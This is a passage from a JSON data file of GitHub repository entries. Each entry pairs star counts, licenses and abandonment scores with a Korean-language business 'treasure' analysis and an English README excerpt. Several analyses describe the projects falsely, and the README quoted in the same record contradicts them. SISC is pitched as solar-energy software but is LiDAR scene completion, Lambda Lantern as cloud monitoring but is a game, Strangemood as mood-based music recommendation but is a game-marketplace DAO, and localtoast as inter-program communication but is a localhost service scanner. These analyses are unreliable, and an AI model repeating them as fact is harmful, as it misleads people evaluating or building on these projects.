분석\n\n## 왜 보물인가\n앱이나 웹사이트의 복잡한 동작 흐름을 단순하게 관리할 수 있게 도와주는 도구로, 버그를 줄이고 개발 속도를 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 주문 결제 과정(결제 대기→결제중→완료→배송)처럼 단계별 진행 상황을 관리하는 웹 서비스\n2. **내부 업무 도구*","readme_excerpt":"# Svelte FSM\n\n<img alt=\"Svelte FSM logo\" align=\"right\" src=\"https://user-images.githubusercontent.com/35901/145653445-72717a87-927d-4bcd-b616-aa3eb6f13cd0.png\">\n\nA tiny, simple, expressive, pramgmatic [Finite State\nMachine](https://en.wikipedia.org/wiki/Finite-state_machine) (FSM) library, optimized for\n[Svelte](https://svelte.dev).\n* **tiny:** under `1kb` (minified); zero dependencies\n* **simple:** implements core FSM features, not the kitchen sink\n* **expressive:** FSM constructs are mapped to core JavaScript features (see\n  [Usage Overview](#usage-overview) below)\n* **pragmatic:** prioritizes developer happiness over strict adherance to FSM or Statechart\n  formalizations\n* **Svelte-optimized:** implements Svelte's\n  [store contract](https://svelte.dev/docs#Store_contract);\n  philosophically aligned – feels at-home in a Svelte codebase\n\n## Quick Start\n\n### Installation\n\n```bash\nnpm install svelte-fsm\n```\n\n### Create your first FSM and use it in a Svelte component\n\n```svelte\n<script>\n","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"strangemoodfoundation/strangemood","github_url":"https://github.com/strangemoodfoundation/strangemood","stars":7,"language":"TypeScript","license":"unknown","abandonment_months":51,"description":"# Strange Mood Foundation 저장소 분석\n\n## 왜 보물인가\n저장소 설명이 없고 최근 업데이트가 2022년에 멈춰있어 현재 활발히 관리되는 프로젝트인지 판단하기 어렵습니다.\n\n## 어디에 쓸 수 있나\n1. **감정 인식 기반 음악 추천 SaaS**: 사용자의 기분을 감지하여 맞춤형 재생 목록을 제공하는 서비스\n2. **정신건강 관리 내부 ","readme_excerpt":"<p align=\"center\">\n<h1 align=\"center\">☼ Strangemood ☼</h1>\n</p>\n\nStrangemood is a decentralized marketplace for video games that's controlled by its sellers. It's like Steam.\n\nUnlike Steam, Strangemood is a _protocol_, like email or RSS, not a product. Anyone can build their own marketplace on top of Strangemood, just like anyone can make a podcasting app or an email client.\n\nStrangemood puts 1% of sales into a community account on the [Solana](https://solana.com/) blockchain. When you sell a game on Strangemood, you get voting tokens that collectively control that community account. In other words, Strangemood is an internet-scale co-op; aka a DAO. Collectively, this organization is called the Strangemood foundation. These fees primarily go to fund ecosystem projects on-top of the protocol, like marketplaces GUIs, game indexes, back-office tools, game-engine plugins, and anything else the community needs. The sellers may also vote to raise or lower the 1% contribution rate, or to upda","composite_score":0.5005,"license_safety_tag":"unknown"},{"name":"anoymous-face/FFC","github_url":"https://github.com/anoymous-face/FFC","stars":13,"language":"Python","license":"unknown","abandonment_months":60,"description":"# FFC (Face Recognition) 저장소 분석\n\n## 왜 보물인가\n사진에서 사람의 얼굴을 자동으로 인식하고 분류하는 기술로, 보안, 마케팅, 의료 등 다양한 분야에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 출입 통제 시스템(사원증 없이 얼굴로 출입 허용)으로 기업에 월 구독료 판매\n- **내부 업무 도구**","readme_excerpt":"# Fast Face Classification (F²C)\r\nThis is the code of our paper An Efficient Training Approach for Very Large Scale Face Recognition or F²C for simplicity.\r\n\r\n\r\nTraining on ultra-large-scale datasets is time-consuming and takes up a lot of hardware resource. Therefore we design a dul-data loaders and dynamic class pool to deal with large-scale face classification.\r\n\r\n***Pipeline***\r\n\r\n![Arch](source/pipe.jpg)\r\n### Preparation\r\nAs FFC contains LRU module, so you may use lru_python_impl.py or instead \r\ncompile the code under lru_c directory. \r\n\r\nIf you choose lru_python_impl.py, you should rename lru_python_impl.py to lru_utils.py.\r\nAs lru is not the bottleneck of the training procedure, so feel free to use python implementation, though\r\nthe C++ implementation is 5~10 times faster than python version.\r\n\r\n#### Compile LRU (optional)\r\nCommand to build LRU\r\n``` shell\r\ncd lru_c\r\nmkdir build\r\ncd build\r\ncmake ..\r\nmake\r\ncd ../../ && ln -s lru_c/build/lru_utils.so .\r\n```\r\nYou can compare this tw","composite_score":0.5005,"license_safety_tag":"unknown"},{"name":"xrr2016/tata","github_url":"https://github.com/xrr2016/tata","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":42,"description":"# xrr2016/tata 저장소 분석\n\n## 왜 보물인가\n저장소 설명이 없고 커밋이 2022년에 멈춰있어 활발히 유지되는 프로젝트인지 확인이 필요합니다.\n낮은 스타 수(8개)는 아직 알려지지 않은 숨은 보석이거나 완성도가 낮을 수 있습니다.\n정확한 평가를 위해 코드 내용과 용도를 먼저 파악해야 합니다.\n\n## 어디에 쓸 수 있나\n**내부 업무 도구**: ","readme_excerpt":"# TaTa.js\n\n[Live Demo](https://xrr2016.github.io/tata)\n\n[![GitHub issues](https://img.shields.io/github/issues/xrr2016/tata.svg)](https://github.com/xrr2016/tata/issues) [![GitHub forks](https://img.shields.io/github/forks/xrr2016/tata.svg)](https://github.com/xrr2016/tata/network) [![GitHub stars](https://img.shields.io/github/stars/xrr2016/tata.svg)](https://github.com/xrr2016/tata/stargazers)\n\n## Install\n\n> yarn add tata-js\n\n```js\nimport tata from 'tata-js'\n```\n\nOR\n\n```html\n<script src=\"tata.js\"></script>\n```\n\n## Usage\n\n```js\ntata.text('Hello', 'Have a nice day.', {// config})\ntata.log('Hello', 'Have a nice day.', {// config})\ntata.info('Hello', 'Have a nice day.', {// config})\ntata.success('Hello', 'Have a nice day.', {// config})\ntata.warn('Hello', 'Have a nice day.', {// config})\ntata.error('Hello', 'Have a nice day.', {// config})\n```\n\n## Config\n\n| name | tpye | default | Description |\n|---------|--------|--------|-------------|\n| position | string | tr | tr, tm, tl, mr, mm, ml,","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"mristin/icontract-hypothesis","github_url":"https://github.com/mristin/icontract-hypothesis","stars":17,"language":"Python","license":"MIT","abandonment_months":48,"description":"# icontract-hypothesis 분석\n\n## 왜 보물인가\n소프트웨어 개발자들이 작성한 코드에서 버그를 자동으로 찾아주는 도구로, 반복적인 테스트 작업을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 코드 검증 플랫폼으로, 개발팀들이 구독하여 매달 자동 품질 점검을 받는 서비스\n2. **내부 ","readme_excerpt":"icontract-hypothesis\n====================\n\n.. image:: https://github.com/mristin/icontract-hypothesis/workflows/CI/badge.svg\n    :target: https://github.com/mristin/icontract-hypothesis/actions?query=workflow%3ACI\n    :alt: Continuous integration\n\n.. image:: https://coveralls.io/repos/github/mristin/icontract-hypothesis/badge.svg?branch=main\n    :target: https://coveralls.io/github/mristin/icontract-hypothesis?branch=main\n    :alt: Test coverage\n\n.. image:: https://badge.fury.io/py/icontract-hypothesis.svg\n    :target: https://badge.fury.io/py/icontract-hypothesis\n    :alt: PyPI - version\n\n.. image:: https://img.shields.io/pypi/pyversions/icontract-hypothesis.svg\n    :alt: PyPI - Python Version\n\nIcontract-hypothesis combines design-by-contract with automatic testing.\n\nIt is an integration between\n`icontract <https://github.com/Parquery/icontract>`_\nlibrary for design-by-contract and\n`Hypothesis <https://github.com/HypothesisWorks/hypothesis>`_ library for\nproperty-based testing.\n\nThe r","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"wybiral/localtoast","github_url":"https://github.com/wybiral/localtoast","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":67,"description":"# LocalToast 분석 보고서\n\n## 왜 보물인가\n컴퓨터에 설치된 프로그램끼리 서로 대화하고 데이터를 주고받을 수 있게 해주는 기초 기술로, 많은 소프트웨어의 숨은 기반이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n**1. 회사 내부 업무 도구**: 직원들의 컴퓨터에 있는 여러 프로그램들(메일, 일정관리, 파일공유)을 자동으로 연결해 데이터를 공유하","readme_excerpt":"# localtoast\n\nScan localhost for various popular services.\n\n[Try it here](https://wybiral.github.io/localtoast/)\n","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"signalwire/browser-videoconf-full-react","github_url":"https://github.com/signalwire/browser-videoconf-full-react","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":25,"description":"# 저장소 분석: signalwire/browser-videoconf-full-react\n\n## 왜 보물인가\n웹브라우저에서 바로 실행되는 화상회의 솔루션으로, 별도 프로그램 설치 없이 영상통화를 구현할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n- **원격 진료 플랫폼**: 병원이 환자와 1:1 화상 상담 서비스를 제공하는 SaaS 형태로 운영\n- *","readme_excerpt":"# Zoom Clone example\n\nThis example uses the components from\n[@signalwire-community/react](https://github.com/signalwire-community/react/)\nto create a zoom-like app.\n\n📖 [Read the full guide](https://developer.signalwire.com/guides/video/zoom-clone)\n\n## Usage\n\nIn the root of the project directory, run `yarn install` to install the dependencies, then `yarn dev` to start the application. [Please read the guide for more details.](https://developer.signalwire.com/guides/video/zoom-clone)\n","composite_score":0.5005,"license_safety_tag":"unknown"},{"name":"internet5/smart-array-to-tree","github_url":"https://github.com/internet5/smart-array-to-tree","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":62,"description":"# smart-array-to-tree 사업화 분석\n\n## 왜 보물인가\n복잡한 데이터를 깔끔한 구조로 자동 정렬해주는 작은 도구로, 수많은 웹 서비스와 앱에서 기초 기술로 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **조직도 생성 SaaS**: 회사 구성원 정보를 입력하면 자동으로 부서별 조직도를 만드는 서비스\n2. **상품 분류 API**: 온","readme_excerpt":"English | [简体中文](./README.zh-CN.md)\n\n# smart-array-to-tree\n[![Build Status](https://travis-ci.org/internet5/smart-array-to-tree.svg?branch=master)](https://travis-ci.org/internet5/smart-array-to-tree)<br />\nConvert large amounts of data array to nested data structure fastly!<br />\nUse the test data that array length 46086, just take about 0.1 second.<br />\n<br />\n\n# Installation && Usage\n\nIn Node.js:\n```shell\n$ npm i smart-arraytotree --save\n```\n```javascript\nvar smartArrayToTree = require('../index.js');\nvar fetch = require('node-fetch');\n//get test data length 46086\nfetch('https://raw.githubusercontent.com/internet5/smart-array-to-tree/master/example/data.json').then(function(response) {\n  return response.json();\n}).then(function(data) {\n  //start time\n  console.log(new Date());\n  //transform\n  let tree = smartArrayToTree(data, { id:'regionId', pid:'parentId', firstPid:null });\n  //end time\n  console.log(new Date());\n}).catch(function(e) {\n  console.log(e);\n});\n/*console*/\n//2017-11-","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"dinohamzic/displaceable","github_url":"https://github.com/dinohamzic/displaceable","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":41,"description":"# displaceable 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자가 화면 요소를 드래그해서 원하는 위치로 움직일 수 있게 해주는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 대시보드 서비스**: 사용자가 자신의 작업 화면을 자유롭게 커스터마이징할 수 있는 구성 가능한 대시보드 판매\n2. **내부 업무 도구**: 기업의 협업 플","readme_excerpt":"# displaceable\n\nA tiny JavaScript library that handles super smooth element displacement on mouse move. Inspired by this [shot](https://dribbble.com/shots/5594494-Molley-Heltz-Inspiration-Page-Animation).\n\n![Displaceable screen capture](screen-capture.gif)\n\n---\n\n## Demo and code examples\n\nLive [demo](https://subtlebits.com/projects/displaceable) and React implementation [example](https://github.com/dinohamzic/www-subtlebits-com/blob/master/pages/projects/displaceable.js).\n\n## Setup\n\n#### Install:\n\n```bash\nnpm install displaceable\n```\n\n## Basic usage\n\n#### Import:\n\n```js\nimport Displaceable from 'displaceable';\n```\n\n#### Initialize:\n\n```js\n// single Node\nconst displaceable = new Displaceable(document.getElementById('id'));\n```\n\nor\n\n```js\n// NodeList\nconst displaceable = new Displaceable(document.querySelectorAll('img'));\n```\n\nor\n\n```js\n// array of Nodes\nconst displaceable = new Displaceable([\n  document.getElementById('id-1'),\n  document.getElementById('id-2'),\n  document.getElementById","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"OPEN-AIR-SUN/SISC","github_url":"https://github.com/OPEN-AIR-SUN/SISC","stars":6,"language":"Python","license":"unknown","abandonment_months":40,"description":"# OPEN-AIR-SUN/SISC 분석 보고서\n\n## 왜 보물인가\n태양열 에너지 시스템을 똑똑하게 관리하고 효율을 높일 수 있는 소프트웨어로, 재생에너지 전환 시대에 수요가 늘어날 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **태양열 설치업체용 SaaS**: 고객별 태양열 시스템 성능을 실시간 모니터링하고 유지보수를 자동으로 관리하는 클라우드 서비스\n2","readme_excerpt":"# Semi-supervised Implicit Scene Completion from Sparse LiDAR\n\n[**New Repo**](https://github.com/AIR-DISCOVER/LODE) \n\n[**Paper**](https://arxiv.org/pdf/2111.14798.pdf) \n\nCreated by Pengfei Li, Yongliang Shi, Tianyu Liu, Hao Zhao, Guyue Zhou and YA-QIN ZHANG from <a href=\"http://air.tsinghua.edu.cn/EN/\" target=\"_blank\">Institute for AI Industry Research(AIR), Tsinghua University</a>.\n\n![demo](doc/demo.gif)\n\nFor complete video, click [HERE](https://youtu.be/8x_XOSrr5K0).\n\nWe use the proposed model trained on the KITTI dataset to predict implicit completion results on the novel [DAIR-V2X](http://air.tsinghua.edu.cn/dair-v2x/) dataset. The results are impressive:\n\n![china](doc/v2x.jpg)\n![china_1](doc/v2x.gif)\n\n\n\n![teaser](doc/qualitative.png)\n\n![sup0](doc/qualitative_0.png)\n\n![sup1](doc/qualitative_1.png)\n\n![sup2](doc/qualitative_2.png)\n\n![sup3](doc/qualitative_3.png)\n\n![sup4](doc/qualitative_4.png)\n\n\n## Introduction\n\nRecent advances show that semi-supervised implicit representation learni","composite_score":0.5005,"license_safety_tag":"unknown"},{"name":"obsidiandynamics/jackdaw","github_url":"https://github.com/obsidiandynamics/jackdaw","stars":7,"language":"Java","license":"BSD-3-Clause","abandonment_months":47,"description":"# Jackdaw 저장소 분석\n\n## 왜 보물인가\n메시지 큐 시스템을 간단하게 만들어주는 도구로, 여러 프로그램이 안전하게 데이터를 주고받을 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객들이 자신의 앱에서 실시간으로 알림을 받을 수 있는 메시지 전달 플랫폼\n2. **내부 업무 도구**: 회사 내 여러 부서 시스템이 주문,","readme_excerpt":"<img src=\"https://raw.githubusercontent.com/wiki/obsidiandynamics/jackdaw/images/jackdaw-logo.png\" width=\"90px\" alt=\"logo\"/> Jackdaw\n===\nSimple configuration and mocking of Kafka clients.\n\n[![Maven release](https://img.shields.io/maven-metadata/v.svg?color=blue&label=maven-central&metadataUrl=https%3A%2F%2Frepo1.maven.org%2Fmaven2%2Fcom%2Fobsidiandynamics%2Fjackdaw%2Fjackdaw-core%2Fmaven-metadata.xml)](https://mvnrepository.com/artifact/com.obsidiandynamics.jackdaw)\n[![Total alerts](https://img.shields.io/lgtm/alerts/g/obsidiandynamics/jackdaw.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/obsidiandynamics/jackdaw/alerts/)\n[![Gradle build](https://github.com/obsidiandynamics/jackdaw/actions/workflows/master.yml/badge.svg)](https://github.com/obsidiandynamics/jackdaw/actions/workflows/master.yml)\n[![codecov](https://codecov.io/gh/obsidiandynamics/jackdaw/branch/master/graph/badge.svg)](https://codecov.io/gh/obsidiandynamics/jackdaw)\n\n# Why Jackdaw?\nWhile Kafka is an awesome me","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"Rishi-Bidani/local-cloud","github_url":"https://github.com/Rishi-Bidani/local-cloud","stars":12,"language":"TypeScript","license":"MIT","abandonment_months":25,"description":"# Local Cloud 프로젝트 분석\n\n## 왜 보물인가\n자신의 컴퓨터에서 구글 클라우드나 아마존 같은 대형 클라우드 서비스를 직접 운영할 수 있게 해주는 기술로, 민감한 데이터를 외부에 맡기지 않으려는 기업들의 수요가 증가하고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 의료기관 내부 도구**\n환자 정보 같은 극도로 민감한 데이터를 병원 내부 서버에","readme_excerpt":"# local-cloud\n\nThis program can turn your desktop into a local cloud server. This is a website which will run locally over your wifi(\nwithout port forwarding) and will be accessible to all your devices.\n\nYou can now access and transfer files from your different devices with ease. The new version (version 2) has been\nimplemented using vuejs. Version 1 was a pilot project and is not recommended for use(it is not supported by me any\nlonger).\n\n## Version 3\n\nCurrently the server is written in typescript which will work well for development environments with a bit of setup, however I have made the decision to migrate the server to Go to make setup easier and the package more easily distributable.\nPlease check the other development branches for updates.\n\n- Converted to typescript\n- New fresh UI, see images below\n- Configuration file for authentication - don't expose all your files to everyone\n\n## Donation\n\nSupport me to keep making this project better :heart:\n\n[![paypal](https://www.paypalobj","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"fossasia/loklak_walls","github_url":"https://github.com/fossasia/loklak_walls","stars":9,"language":"JavaScript","license":"MIT","abandonment_months":118,"description":"# fossasia/loklak_walls 평가 분석\n\n## 왜 보물인가\n소셜 미디어에서 실시간으로 흘러나오는 수많은 글과 이미지를 한눈에 보여주는 벽화 같은 디스플레이 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **이벤트장 대형 화면 서비스**: 컨퍼런스나 축제에서 특정 주제의 실시간 소셜 미디어 피드를 대형 스크린으로 보여주는 SaaS\n2. **마케팅","readme_excerpt":"# loklak walls\n\n[![Join the chat at https://gitter.im/loklak/loklak](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/loklak/loklak)\n[![Build Status](https://travis-ci.org/fossasia/loklak_walls.svg?branch=master)](https://travis-ci.org/fossasia/loklak_walls)\n[![Code Climate](https://codeclimate.com/github/fossasia/loklak_walls/badges/gpa.svg)](https://codeclimate.com/github/fossasia/loklak_walls)\n\nThe loklak walls app creates social media walls using the loklak server as a data source. The goal is to develop a fully fledged alternative to closed source twitter wall services. In order to run the service you can use the API of http://loklak.org or install your own loklak server data storage engine. For some parts of the service you still require a twitter API currently (to be discontinued in the future). loklak.org is a server application which collects messages from various social media tweet sources, including twitter. The server contains a search index and a peer-to-peer i","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"mcclure/NFTBlocker","github_url":"https://github.com/mcclure/NFTBlocker","stars":5,"language":"","license":"unknown","abandonment_months":29,"description":"# NFTBlocker 저장소 분석\n\n## 왜 보물인가\n인터넷에서 원하지 않는 NFT 이미지를 자동으로 숨겨주는 도구로, 암호화폐 열풍에 피로를 느끼는 일반 사용자들의 실질적인 불편함을 해결합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 브라우저 확장 프로그램 SaaS**\n월 구독 형태로 더 강력한 필터링, 커스텀 설정, 클라우드 동기화 등 프리미엄 기능 제","readme_excerpt":"## This information is outdated\n\nSometime in January of 2024, Twitter discontinued the NFT-avatar feature. Therefore, the below software almost certainly does not anymore work. Notice I say \"almost certainly\": On occasion before Twitter has removed features from the *interface* while continuing to store the relevant data in the backend, and JavaScript running on the Twitter domain is often free to query backend information that the interface would not usually show. So it's *possible* that tools (1) and (4) below continue to work on users who *had* NFT avatars before the feature was removed. (Because the new management has both discontinued TweetDeck and made third-party apps such as the AntsStyle blocker nonviable, most likely (2) and (3) will be broken anyway.) Since I no longer use Twitter (and, in my opinion, neither should you) I have not attempted to test this.\n\nFor historical purposes, here is the text that *was* here:\n\n## How to automatically block NFT users on Twitter\n\nTwitter ","composite_score":0.5005,"license_safety_tag":"unknown"},{"name":"fossasia/loklak_tweetheatmap","github_url":"https://github.com/fossasia/loklak_tweetheatmap","stars":11,"language":"JavaScript","license":"MIT","abandonment_months":90,"description":"# fossasia/loklak_tweetheatmap 보물 분석\n\n## 왜 보물인가\n트위터 데이터를 지도 위에 시각화하여 특정 지역의 실시간 대화 흐름과 여론을 한눈에 파악할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 마케팅 회사가 지역별 브랜드 언급량 모니터링 플랫폼으로 제공\n2. **내부 업무 도구**: 언론사/PR","readme_excerpt":"# Tweet Heatmap\n\n[![Join the chat at https://gitter.im/loklak/loklak](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/loklak/loklak)\n\nHeat map with tweets by search query using Loklak API and OpenLayers 3.\n## Try it\nThe project is avaliable at https://fossasia.github.io/loklak_tweetheatmap \n## Technology stack\n* Angular.js 1.5.0\n* OpenLayers 3.12.1\n\n## Meta\nCreated by Seva Zhidkov (@sevazhidkov) in Google Code-In 2015 with mentoring of\nSudheesh Singanamalla (@sudheesh001) and Michael Peter Christen (@Orbiter).\n\nMIT License.\n","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"PaackEng/paack-ui","github_url":"https://github.com/PaackEng/paack-ui","stars":8,"language":"Elm","license":"BSD-3-Clause","abandonment_months":30,"description":"# Paack UI 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱을 만들 때 필요한 버튼, 입력창 등의 디자인 요소들을 미리 만들어둔 도구 모음으로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **배송 관리 SaaS**: Paack은 배송업체이므로, 배송 추적 웹사이트나 고객 관리 시스템의 UI 컴포넌트로 직접 활용 가능\n2. ","readme_excerpt":"# Paack UI\n\nThe paack-ui package provides ready-to-use components using Elm UI, based on the design sketches elaborated for Paack's apps.\n\nThe components' API strikes to be strict. That means it pragmatically stops the developer from performing undesired options combinations. Thus, producing unexpected behaviors or non-planned visuals artifacts.\n\nThe purpose of using Elm UI is mostly to keep components accessible.\n\nThe usage of this library is mostly internal, but we are open to suggestions and feedback.\n\n## Example\n\nHere's an example of this package in action:\n\n```elm\nmodule Pages.Login.View exposing (container)\n\nimport Element exposing (Element, fill, maximum, minimum, shrink)\nimport UI.Button as Button\nimport UI.Document as Nav\nimport UI.RenderConfig as RenderConfig exposing (RenderConfig)\nimport UI.Text as Text\nimport UI.TextField as TextField\n-- and others\n\n\ncontainer : AppConfig -> Model -> Nav.Page Msg\ncontainer appConfig model =\n  viewBody appConfig model\n    |> Nav.bodySingle\n","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"lettier/lambda-lantern","github_url":"https://github.com/lettier/lambda-lantern","stars":6,"language":"PureScript","license":"BSD-3-Clause","abandonment_months":85,"description":"# Lambda Lantern 분석 보고서\n\n## 왜 보물인가\n클라우드 환경에서 실행되는 프로그램들의 동작을 시각적으로 추적하고 문제를 찾을 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 웹 애플리케이션 회사들이 자사 서비스의 성능 모니터링 기능으로 탑재\n2. **내부 업무 도구**: 대규모 IT 인프라를 운","readme_excerpt":"# Lambda Lantern :smiley:\n\n![Lambda Lantern](https://i.imgur.com/qsocAZg.png)\n\n# What is Lambda Lantern? :thinking:\n\n![Lambda Lantern](https://i.imgur.com/wQBJNrS.gif)\n\nLambda Lantern is a game made with PureScript, PureScript Native, and Panda3D.\nThe premise of the game involves collecting and using functional programming patterns\nto solve puzzles and ultimately escape a dungeon.\n\nOne of the purposes of Lambda Lantern is to demonstrate binding PureScript to C++.\n\nLambda Lantern originally started as a [GitHub Game Off submission](https://itch.io/jam/game-off-2018/rate/338096).\n\n# How do I build and run Lambda Lantern? :hammer:\n\n![Lambda Lantern](https://i.imgur.com/V6bVIRR.png)\n\n```bash\n# Install Git.\n# Install nvm (https://github.com/creationix/nvm).\n# Install Panda3D (https://www.panda3d.org/download/sdk-1-10-1/).\n# Install Haskell Stack (https://docs.haskellstack.org/en/stable/README/).\n\ncd\n\n# Install PureScript Native (https://github.com/andyarvanitis/purescript-native).\n\ngit clon","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"njulj/AdaDM","github_url":"https://github.com/njulj/AdaDM","stars":9,"language":"Python","license":"MIT","abandonment_months":55,"description":"# AdaDM 저장소 분석\n\n## 왜 보물인가\n이미지나 영상을 더 선명하게 만드는 인공지능 기술로, 의료 영상 진단이나 보안 카메라 분석처럼 화질이 중요한 분야에서 큰 가치를 발휘할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 온라인 사진 복원 플랫폼**\n사용자가 낡은 사진이나 흐릿한 이미지를 업로드하면 자동으로 선명하게 변환해주는","readme_excerpt":"# AdaDM\n## [AdaDM: Enabling Normalization for Image Super-Resolution](https://arxiv.org/abs/2111.13905).\n You can apply BN, LN or GN in SR networks with our AdaDM. Pretrained models (EDSR\\*/RDN\\*/NLSN\\*) can be downloaded from\n [Google Drive](https://drive.google.com/drive/folders/1xljnGUUPAXpdAzXxCUMz5Rs2yOMAMOx6?usp=sharing) or\n [BaiduYun](https://pan.baidu.com/s/18I3j4DJFvbNvTFHzDwsssA). The password for BaiduYun is `kymj`.\n\n:loudspeaker: If you use [BasicSR](https://github.com/xinntao/BasicSR) framework, you need to turn off the Exponential Moving Average (EMA) option when\napplying BN in the generator network (e.g., RRDBNet). You can disable EMA by setting `ema_decay=0` in corresponding `.yml` configuration file. \n\n| Model    | Scale | File name (.pt) | Urban100 | Manga109 |\n|  ---     |  ---  | ---             | ---        | ---      |\n|**EDSR** | 2 |                     | 32.93 | 39.10 |\n|| 3 || 28.80 | 34.17 |\n|| 4 || 26.64 | 31.02 |\n|**EDSR***| 2 | [EDSR_AdaDM_DIV2K_X2](https:/","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"Lotus6/FileMonitor","github_url":"https://github.com/Lotus6/FileMonitor","stars":6,"language":"","license":"unknown","abandonment_months":55,"description":"# FileMonitor 저장소 분석\n\n## 왜 보물인가\n컴퓨터 파일의 변화를 자동으로 감시하고 추적하는 도구로, 데이터 손실 방지와 보안 감시가 필요한 조직에 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 파일 보안 서비스**: 직원들의 중요 파일 접근·수정 내역을 자동으로 기록하고 경고하는 구독형 서비스\n2. **의료·법무 기관 준수 도","readme_excerpt":"# FileMonitor\n\n* FileMonitor文件监控小工具，监控文件，新增，修改，删除，重命名。 (如果感觉对您有帮助，感觉不错的话，请您给个大大的 ⭐️❗️)\n* 用于代码审计时监控文件夹内文件的变动，支持Mac，Windows，Linux。\n* 第一次运行时请根据提示在此页面下载对应动态依赖库放到指定位置即可（注意版本！）。\n\n**V1.0**\n```\njava -jar FileMonitor.jar -p 监控目录\n```\n<img width=\"849\" alt=\"截屏2021-11-29 下午10 56 36\" src=\"https://user-images.githubusercontent.com/63742814/143891506-1e28b2f7-face-4e25-924b-25149f1c97fe.png\">\n\n\n**免责声明**\n\n##\n本工具仅能在取得足够合法授权的企业安全建设中使用，在使用本工具过程中，您应确保自己所有行为符合当地的法律法规。\n\n\n如您在使用本工具的过程中存在任何非法行为，您将自行承担所有后果，本工具所有开发者和所有贡献者不承担任何法律及连带责任。\n\n\n除非您已充分阅读、完全理解并接受本协议所有条款，否则，请您不要安装并使用本工具。\n\n\n您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的，即视为您已阅读并同意本协议的约束。\n","composite_score":0.5005,"license_safety_tag":"unknown"},{"name":"sorrycc/toy-vite","github_url":"https://github.com/sorrycc/toy-vite","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":60,"description":"# toy-vite 상용화 분석\n\n## 왜 보물인가\n웹사이트 개발 속도를 획기적으로 높여주는 도구로, 개발자의 생산성 향상을 통해 프로젝트 완성 시간을 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개발 회사들이 웹사이트를 더 빠르게 만들 수 있게 도와주는 개발자용 구독 서비스\n- **내부 업무 도구**: 회사 내 개발팀이 업","readme_excerpt":"# toy-vite\n\n## Usage\n\n```bash\n# Install dependencies\n$ yarn\n\n# Precompile dependencies\n$ yarn optmize\n\n# Start the dev server\n$ yarn dev\n```\n\n## LICENSE\n\nMIT\n","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"jensneuse/goprisma","github_url":"https://github.com/jensneuse/goprisma","stars":13,"language":"Go","license":"Apache-2.0","abandonment_months":52,"description":"# goprisma 저장소 분석\n\n## 왜 보물인가\nGo 언어로 데이터베이스를 쉽게 다룰 수 있도록 만든 도구로, 복잡한 코딩 없이도 데이터 관리를 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 데이터 관리 플랫폼에서 데이터베이스 작업을 빠르게 처리하는 백엔드 기술로 활용\n- **내부 업무 도구**: 기업의 직원 정보,","readme_excerpt":"# GoPrisma - a Go wrapper for the Prisma Engines\n\n## What's this?\n\nIntrospect a database and use it as a GraphQL API using Go.\n\nSupported Databases:\n- [x] SQLite\n- [x] PostgreSQL\n- [x] MySQL\n- [x] MongoDB\n- [x] MS SQL Server\n- [ ] CockroachDB\n\n## How to use this in production?\n\nIt might be obvious, but I just want to make it clear that you should NOT publicly expose your database with this library.\nThis is only intended for use cases where the GraphQL API is shielded by some other component.\n\nWe're using goprisma internally in WunderGraph which adds such a shielding layer,\nwith authentication, authorization, role-based access control, caching and more.\n\nAdditionally, WunderGraph comes with a TypeScript SDK,\nso you can introspect multiple databases as well as GraphQL and REST APIs and join them together.\n\nCheck out [WunderGraph if you're interested in a production-grade solution](https://wundergraph.com).\nHere's a link to the [docs on all supported DataSources](https://wundergraph.com/d","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"fossasia/phimpme-joomla","github_url":"https://github.com/fossasia/phimpme-joomla","stars":11,"language":"","license":"Apache-2.0","abandonment_months":69,"description":"# fossasia/phimpme-joomla 분석\n\n## 왜 보물인가\n사진 관리를 쉽게 해주는 무료 도구를 웹사이트에 바로 설치해서 쓸 수 있어, 별도의 복잡한 설정 없이 누구나 